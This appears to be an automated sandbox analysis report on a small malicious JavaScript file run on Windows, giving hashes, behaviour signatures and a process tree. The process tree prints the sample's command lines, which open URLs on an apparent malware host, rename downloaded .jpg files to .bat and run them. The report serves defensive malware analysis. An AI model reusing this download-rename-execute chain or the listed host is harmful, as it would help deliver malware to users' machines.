Analysis
max time kernel: 172s
max time network: 215s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64 arch:x86 image:win7-20221111-en locale:en-us os:windows7-x64 system
submitted: 02-12-2022 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: 61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
  Resource: win10v2004-20220812-en
General
Target: 61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
Size: 680B
MD5: 6736d1f43e6302e8f949f7d16251e9c7
SHA1: 6f1ef9345264627e9723443db718f37599a92e12
SHA256: 61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc
SHA512: 7049bf60704cbf3de01bea502eb1ebfe47109f18af4d48cbe3d8d82599ba62b31d2f76bdaa7e5b9405ae710df9fb66d8502ee3433950a9f539920b75542a6077
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings (registry key IoC listing omitted)

Suspicious use of FindShellTrayWindow (1 IoC)
pid   Process
692   iexplore.exe

Suspicious use of SetWindowsHookEx (8 IoCs)
pid   Process
692   iexplore.exe
692   iexplore.exe
1268  IEXPLORE.EXE
1268  IEXPLORE.EXE
1268  IEXPLORE.EXE
1268  IEXPLORE.EXE
516   IEXPLORE.EXE
516   IEXPLORE.EXE

Suspicious use of WriteProcessMemory (29 IoCs; 9 distinct parent/child pairs, each listed once)
description                        pid   Process       procid_target
PID 2000 wrote to memory of 516    2000  wscript.exe   28
PID 516 wrote to memory of 692     516   cmd.exe       30
PID 692 wrote to memory of 1268    692   iexplore.exe  32
PID 2000 wrote to memory of 1384   2000  wscript.exe   33
PID 2000 wrote to memory of 1624   2000  wscript.exe   36
PID 2000 wrote to memory of 1664   2000  wscript.exe   38
PID 2000 wrote to memory of 524    2000  wscript.exe   40
PID 2000 wrote to memory of 1204   2000  wscript.exe   42
PID 692 wrote to memory of 516     692   iexplore.exe  44
Processes
(indentation shows the parent/child relationship; the depth numbers are the report's own)

Depth 1: C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
  PID: 2000
  - Suspicious use of WriteProcessMemory
  Depth 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c start /b https://installationupgrade6.com/0ssdt1/index/b1/?servername=msi
    PID: 516
    - Suspicious use of WriteProcessMemory
    Depth 3: C:\Program Files\Internet Explorer\iexplore.exe
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://installationupgrade6.com/0ssdt1/index/b1/?servername=msi
      PID: 692
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      Depth 4: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:275457 /prefetch:2
        PID: 1268
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
      Depth 4: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:4207618 /prefetch:2
        PID: 516
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
  Depth 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c start /b https://installationupgrade6.com/0ssdt1/index/b2/?servername=msi
    PID: 1384
  Depth 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c rename b1.jpg b1.bat
    PID: 1624
  Depth 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c rename b2.jpg b2.bat
    PID: 1664
  Depth 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c b2.bat
    PID: 524
  Depth 2: C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c b1.bat
    PID: 1204
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50CD3D75D026C82E2E718570BD6F44D0_20CC038712CEB11FDE6577FC4F848B40
Filesize: 313B
MD5: c9e8d050c94ec145cd36e685a9888972
SHA1: e8ea433c540b646f19172b68c7cfe149221a0c54
SHA256: 3b782373e8df45786c07e3354eb02947e418026bc4855b80be1d93d9da0db39d
SHA512: de8caffdc24d5394a4d0310a7084a9441d56d5ee8c6b2ff12910ae8c17d242bc518597e3cfa61a56934ca206e12e77c1a4ac04811ba76e5e8f6b11241e438ea1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize: 471B
MD5: e77da6e9a9be2a3136ae8ae48f40a600
SHA1: 8bb49875df1fa56138e9285a3ceaa3d9299f81eb
SHA256: a9677f964dd3a18a2b74385ede2d9dcb36913e81b02b5190fcf2ce0b3499e161
SHA512: afed382b106eac94c4f7fd0986c92ba8433c322b832ab2a9e90b27b4b68b4adcbf6da645301f8aac3c0357aa56ede5f5ea2ed6424543da7df289d879409840f0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50CD3D75D026C82E2E718570BD6F44D0_20CC038712CEB11FDE6577FC4F848B40
Filesize: 404B
MD5: 486cd073b039019286a2fc9c73ef61e2
SHA1: 9b831082586ff30d9c78e33cf6051cb6fea40df9
SHA256: b2119b073ca5e6fbfca24a42c590d30cb7c370f83452002254fd08c20e04838d
SHA512: ea9bf8bf5c8915b56ade723dd34d2e6997cff100870b2282fe62654eddba6cee037c0f4016991e241373afc9780c12ed0e533636035460f113d60bb65eedeae3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
MD5: de7307c066517bca5ce3df2dd7fbae58
SHA1: d5d650385c50775266ea6e43f1e93329e4001765
SHA256: 1c0b497451b7c2f704b3f990a6563ebfee6d0b6e79db43237e21f8f934ed9608
SHA512: e165059d96384385da7c097f3406c9f0f95f8f1a242b6acc3e43de03e598444e26cb56472edbd8d176722265f6d6b2dee2e08eabbaa13894b5e6d1cc9603d5b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize: 434B
MD5: f3d0ee3d3ddd993ab1f543dd741329b5
SHA1: d8c678a1c05de5d1a0ae8e9fbf9639d32c14402f
SHA256: 51fd2f36a9c9a2f039c23c65d0a98810d78bf33600db5e019f438aa8d4645c7f
SHA512: 4051869f9db21c5a01b9ab36e034c7aa7189426e231cbbd3f6f6677ea0a18d2cac7d04764867284543e466d5749d0bcfd63b5557c538f0e98769169e7e09eaff

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize: 434B
MD5: d5be2fc1bf23e60a94afd7422e8fa278
SHA1: 9e038512cdb8cde450e67618412ce68ec8d18ef4
SHA256: 003ba216a2a4f8b5fa658c8bba8d9457783821f51738d369a8c993e6b68b6836
SHA512: 561644d123cd48043201241145cf4e7c6db0e6853ce3bd32f14531765a54a382fed83398162ef5563ef405a071e87c2b737458279908c5bf500c7a81ebb01a68

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize: 404B
MD5: 3574d57d5af15b40e553bc653213c5bd
SHA1: 4ed0db8178e00f18e819790b07884964df350cf9
SHA256: 52331585b38e810888426fdd50c4e477019351fc270f1bd403697895fe9b7cd3
SHA512: aaa9878d50549f013335d7934d76f611eb165eb0fec17ded02d2f6ef7d95a72a3f77e93aabe3cd9be094ac2421587acf3be87236c9c3269463d53a4f0a0bc9d2

Filesize: 533B
MD5: 69d41fdc50ed80b6111b2ebf4e754026
SHA1: 17f0c2b118de27f5bd52308a50c4afd0d12ffa1c
SHA256: 4eee1ebeaa8b3c4e4a8acbce117e75f7516fff0b1670b5d4bc321f844ecff9fc
SHA512: 988b7dfe8f3c29de05c6b67170536b12a6b16cbb91759e77c5d3b3a4b2aa22dc6d21c3f94acf6cc59dfbd1a59be3954227445ed77f54f7754bc798da9039df7d